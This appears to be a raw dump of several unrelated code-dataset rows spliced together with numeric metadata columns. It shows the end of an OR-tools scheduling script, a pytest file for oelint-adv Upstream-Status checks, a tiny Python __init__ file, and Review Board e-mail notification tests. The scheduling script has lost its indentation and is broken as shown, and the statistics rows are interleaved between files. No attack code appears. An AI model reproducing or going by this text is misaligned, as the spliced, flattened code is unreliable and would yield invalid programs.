0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,
1, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
]]
ntasks = len(available)
nslots = len(available[0])
# sets
all_tasks = range(ntasks)
all_slots = range(nslots)
# max tasks per time slot
capacity = 3
# Model
model = cp_model.CpModel()
assign = {}
for task in all_tasks:
for slot in all_slots:
assign[(task, slot)] = model.NewBoolVar('x[%i][%i]' % (task, slot))
count = model.NewIntVar(0, nslots, 'count')
slot_used = [model.NewBoolVar('slot_used[%i]' % s) for s in all_slots]
for task in all_tasks:
model.Add(
sum(assign[(task, slot)] for slot in all_slots
if available[task][slot] == 1) == 1)
for slot in all_slots:
model.Add(
sum(assign[(task, slot)] for task in all_tasks
if available[task][slot] == 1) <= capacity)
model.AddBoolOr([
assign[(task, slot)] for task in all_tasks
if available[task][slot] == 1
]).OnlyEnforceIf(slot_used[slot])
for task in all_tasks:
if available[task][slot] == 1:
model.AddImplication(slot_used[slot].Not(),
assign[(task, slot)].Not())
else:
model.Add(assign[(task, slot)] == 0)
model.Add(count == sum(slot_used))
# Redundant constraint. This instance is easier if we add this constraint.
# model.Add(count >= (nslots + capacity - 1) // capacity)
model.Minimize(count)
# Create a solver and solve the problem.
solver = cp_model.CpSolver()
# Uses the portfolion of heuristics.
solver.parameters.log_search_progress = True
solver.parameters.num_search_workers = 6
status = solver.Solve(model)
print('Statistics')
print(' - status =', solver.StatusName(status))
print(' - optimal solution =', solver.ObjectiveValue())
print(' - wall time : %f s' % solver.WallTime())
if __name__ == '__main__':
main()
| 41.519164
| 90
| 0.359852
| 2,867
| 11,916
| 1.484827
| 0.053017
| 1.017618
| 1.490486
| 1.939394
| 0.653982
| 0.630021
| 0.630021
| 0.62086
| 0.62086
| 0.62086
| 0
| 0.350811
| 0.395015
| 11,916
| 286
| 91
| 41.664336
| 0.2397
| 0.082662
| 0
| 0.685714
| 0
| 0
| 0.009083
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004082
| false
| 0
| 0.004082
| 0
| 0.008163
| 0.016327
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b963ff5a9f5c537b8255d3dc4af97da6d1e0a08b
| 2,612
|
py
|
Python
|
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
import pytest
from .base import TestBaseClass
class TestClassOelintFileUpstreamStatusInactiveUpstreamDetails(TestBaseClass):
@pytest.mark.parametrize('id', ['oelint.file.inactiveupstreamdetails'])
@pytest.mark.parametrize('occurrence', [1])
@pytest.mark.parametrize('input',
[
{
'oelint_adv-test.bb':
'SRC_URI = "file://test.patch"',
'files/test.patch':
'Upstream-Status: Inactive-Upstream',
},
{
'oelint_adv-test.bb':
'SRC_URI = "file://test.patch"',
'files/test.patch':
'Upstream-Status: Inactive-Upstream [1234]',
},
],
)
def test_bad(self, input, id, occurrence):
self.check_for_id(self._create_args(input), id, occurrence)
@pytest.mark.parametrize('id', ['oelint.file.inactiveupstreamdetails'])
@pytest.mark.parametrize('occurrence', [0])
@pytest.mark.parametrize('input',
[
{
'oelint_adv-test.bb':
'SRC_URI = "file://test.patch"',
'files/test.patch':
'Upstream-Status: Inactive-Upstream [lastcommit 1234]',
},
{
'oelint_adv-test.bb':
'SRC_URI = "file://test.patch"',
'files/test.patch':
'Upstream-Status: Inactive-Upstream [lastrelease 1234]',
},
{
'oelint_adv-test.bb':
'SRC_URI = "file://test.patch"',
'files/test.patch':
'Upstream-Status: Inactive-Upstream [lastcommit 1234 lastrelease 1234]',
},
],
)
def test_good(self, input, id, occurrence):
self.check_for_id(self._create_args(input), id, occurrence)
| 47.490909
| 109
| 0.369832
| 164
| 2,612
| 5.768293
| 0.231707
| 0.095137
| 0.133192
| 0.079281
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0
| 0.018018
| 0.532542
| 2,612
| 54
| 110
| 48.37037
| 0.756757
| 0
| 0
| 0.469388
| 0
| 0
| 0.255743
| 0.026799
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.040816
| 0
| 0.102041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96794b75cd6b5d3e2b2f64d67142a2d02f92234
| 63
|
py
|
Python
|
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
from .sixty import *
from .sixty import _sixte_dir, _simput_dir
| 31.5
| 42
| 0.809524
| 10
| 63
| 4.7
| 0.6
| 0.382979
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 42
| 31.5
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b972aff8877b7202673b601ba6fd06410b69423a
| 113,125
|
py
|
Python
|
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | 1
|
2017-01-16T09:39:15.000Z
|
2017-01-16T09:39:15.000Z
|
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | null | null | null |
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | 1
|
2018-01-15T19:13:49.000Z
|
2018-01-15T19:13:49.000Z
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.template import TemplateSyntaxError
from django.utils.datastructures import MultiValueDict
from django.utils.six.moves.urllib.request import urlopen
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.models import Profile, ReviewRequestVisit
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.diffviewer.models import FileDiff
from reviewboard.notifications.email import (build_email_address,
build_recipients,
get_email_address_for_user,
get_email_addresses_for_group,
recipients_to_addresses,
send_review_mail)
from reviewboard.notifications.models import WebHookTarget
from reviewboard.notifications.webhooks import (FakeHTTPRequest,
dispatch_webhook_event,
render_custom_content)
from reviewboard.reviews.models import (Group,
Review,
ReviewRequest,
ReviewRequestDraft)
from reviewboard.scmtools.core import PRE_CREATION
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
from reviewboard.webapi.models import WebAPIToken
_CONSOLE_EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
class EmailTestHelper(object):
def setUp(self):
super(EmailTestHelper, self).setUp()
mail.outbox = []
self.sender = 'noreply@example.com'
def assertValidRecipients(self, user_list, group_list=[]):
recipient_list = mail.outbox[0].to + mail.outbox[0].cc
self.assertEqual(len(recipient_list), len(user_list) + len(group_list))
for user in user_list:
self.assertTrue(get_email_address_for_user(
User.objects.get(username=user)) in recipient_list,
"user %s was not found in the recipient list" % user)
groups = Group.objects.filter(name__in=group_list, local_site=None)
for group in groups:
for address in get_email_addresses_for_group(group):
self.assertTrue(
address in recipient_list,
"group %s was not found in the recipient list" % address)
class UserEmailTests(EmailTestHelper, TestCase):
def setUp(self):
super(UserEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_new_user_mail", True)
siteconfig.save()
load_site_config()
def test_new_user_email(self):
"""
Testing sending an e-mail after a new user has successfully registered.
"""
new_user_info = {
'username': 'NewUser',
'password1': 'password',
'password2': 'password',
'email': 'newuser@example.com',
'first_name': 'New',
'last_name': 'User'
}
# Registration request have to be sent twice since djblets need to
# validate cookies on the second request.
self.client.get('/account/register/')
self.client.post('/account/register/', new_user_info)
siteconfig = SiteConfiguration.objects.get_current()
admin_name = siteconfig.get('site_admin_name')
admin_email_addr = siteconfig.get('site_admin_email')
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject,
"New Review Board user registration for NewUser")
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0], build_email_address(admin_name,
admin_email_addr))
class ReviewRequestEmailTests(EmailTestHelper, SpyAgency, TestCase):
"""Tests the e-mail support."""
fixtures = ['test_users']
def setUp(self):
super(ReviewRequestEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_mail", True)
siteconfig.set("mail_default_from", self.sender)
siteconfig.save()
load_site_config()
def test_new_review_request_email(self):
"""Testing sending an e-mail when creating a new review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients(['grumpy', 'doc'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_local_site_group(self):
"""Testing sending email when a group member is part of a Local Site"""
# This was bug 3581.
local_site = LocalSite.objects.create(name=self.local_site_name)
group = self.create_review_group()
user = User.objects.get(username='grumpy')
local_site.users.add(user)
local_site.admins.add(user)
local_site.save()
group.users.add(user)
group.save()
review_request = self.create_review_request()
review_request.target_groups.add(group)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_review_email(self):
"""Testing sending an e-mail when replying to a review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
@add_fixtures(['test_site'])
def test_review_email_with_site(self):
"""Testing sending an e-mail when replying to a review request
on a Local Site
"""
review_request = self.create_review_request(
summary='My test review request',
with_local_site=True)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Ensure all the reviewers are on the site.
site = review_request.local_site
site.users.add(*list(review_request.target_people.all()))
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/s/local-site-1/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/s/local-site-1/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
def test_profile_should_send_email_setting(self):
"""Testing the Profile.should_send_email setting"""
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.should_send_email = False
profile.save()
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(grumpy)
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc'])
def test_review_close_no_email(self):
"""Tests e-mail is not generated when a review is closed and e-mail
setting is False
"""
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
# Verify that no email is generated as option is false by default
self.assertEqual(len(mail.outbox), 0)
def test_review_close_with_email(self):
"""Tests e-mail is generated when a review is closed and e-mail setting
is True
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_close_mail", True)
siteconfig.save()
load_site_config()
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertTrue("This change has been marked as submitted"
in message.as_string())
# Reset settings for review close requests
siteconfig.set("mail_send_review_close_mail", False)
siteconfig.save()
load_site_config()
def test_review_to_submitter_only(self):
"""Test that e-mails from reviews published to the submitter only will
only go to the submitter and the reviewer
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set('mail_send_review_mail', True)
siteconfig.save()
review_request = self.create_review_request(public=True, publish=False)
review_request.target_people = [User.objects.get(username='grumpy')]
review_request.save()
review = self.create_review(review_request=review_request,
publish=False)
review.publish(to_submitter_only=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertEqual(message.cc, [])
self.assertEqual(len(message.to), 2)
self.assertEqual(
set(message.to),
set([get_email_address_for_user(review.user),
get_email_address_for_user(review_request.submitter)]))
def test_review_reply_email(self):
"""Testing sending an e-mail when replying to a review"""
review_request = self.create_review_request(
summary='My test review request')
review_request.publish(review_request.submitter)
base_review = self.create_review(review_request=review_request)
base_review.publish()
# Clear the outbox.
mail.outbox = []
reply = self.create_reply(base_review)
reply.publish()
from_email = get_email_address_for_user(reply.user)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([
review_request.submitter.username,
base_review.user.username,
reply.user.username,
])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'], self._get_sender(reply.user))
def test_update_review_request_email(self):
"""Testing sending an e-mail when updating a review request"""
group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
review_request = self.create_review_request(
summary='My test review request')
review_request.target_groups.add(group)
review_request.email_message_id = "junk"
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_reviewer_review_request_email(self):
"""Testing limited e-mail recipients
when adding a reviewer to an existing review request
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'grumpy' (not
# 'dopey', since he was already included on the review request earlier)
self.assertValidRecipients([review_request.submitter.username,
'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_group_review_request_email(self):
"""Testing limited e-mail recipients
when adding a group to an existing review request
"""
existing_group = Group.objects.create(
name='existing', mailing_list='existing@example.com')
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_groups.add(existing_group)
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
new_group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
draft = ReviewRequestDraft.create(review_request)
draft.target_groups.add(new_group)
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'devgroup' (not
# 'dopey' or 'existing', since they were already included on the
# review request earlier)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_other_fields(self):
"""Testing that recipient limiting only happens when adding reviewers
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Changed summary'
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: Changed summary'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username,
'dopey', 'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_no_email(self):
"""Testing limited e-mail recipients when operation results in zero
recipients
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
profile, is_new = Profile.objects.get_or_create(
user=review_request.submitter)
profile.should_send_own_updates = False
profile.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.remove(User.objects.get(username='dopey'))
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 0)
def test_recipients_with_muted_review_requests(self):
"""Testing e-mail recipients when users mute a review request"""
dopey = User.objects.get(username='dopey')
admin = User.objects.get(username='admin')
group = Group.objects.create(name='group')
group.users.add(admin)
group.save()
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.target_people.add(dopey)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_groups.add(group)
review_request.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
dopey)
visit.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
admin)
visit.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Summary changed'
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_group_member_not_receive_email(self):
"""Testing sending review e-mails and filtering out the review
submitter when they are part of a review group assigned to the request
"""
# See issue 3985.
submitter = User.objects.get(username='doc')
profile = Profile.objects.get_or_create(user=submitter)[0]
profile.should_send_own_updates = False
profile.save()
reviewer = User.objects.get(username='dopey')
group = self.create_review_group()
group.users.add(submitter)
review_request = self.create_review_request(public=True)
review_request.target_groups.add(group)
review_request.target_people.add(reviewer)
review_request.save()
review = self.create_review(review_request, user=submitter)
review.publish()
self.assertEqual(len(mail.outbox), 1)
msg = mail.outbox[0]
self.assertListEqual(
msg.to,
[get_email_address_for_user(reviewer)])
self.assertListEqual(msg.cc, [])
def test_local_site_user_filters(self):
"""Testing sending e-mails and filtering out users not on a local site
"""
test_site = LocalSite.objects.create(name=self.local_site_name)
site_user1 = User.objects.create(
username='site_user1',
email='site_user1@example.com')
site_user2 = User.objects.create(
username='site_user2',
email='site_user2@example.com')
site_user3 = User.objects.create(
username='site_user3',
email='site_user3@example.com')
site_user4 = User.objects.create(
username='site_user4',
email='site_user4@example.com')
site_user5 = User.objects.create(
username='site_user5',
email='site_user5@example.com')
non_site_user1 = User.objects.create(
username='non_site_user1',
email='non_site_user1@example.com')
non_site_user2 = User.objects.create(
username='non_site_user2',
email='non_site_user2@example.com')
non_site_user3 = User.objects.create(
username='non_site_user3',
email='non_site_user3@example.com')
test_site.admins.add(site_user1)
test_site.users.add(site_user2)
test_site.users.add(site_user3)
test_site.users.add(site_user4)
test_site.users.add(site_user5)
group = Group.objects.create(name='my-group',
display_name='My Group',
local_site=test_site)
group.users.add(site_user5)
group.users.add(non_site_user3)
review_request = self.create_review_request(with_local_site=True,
local_id=123)
review_request.email_message_id = "junk"
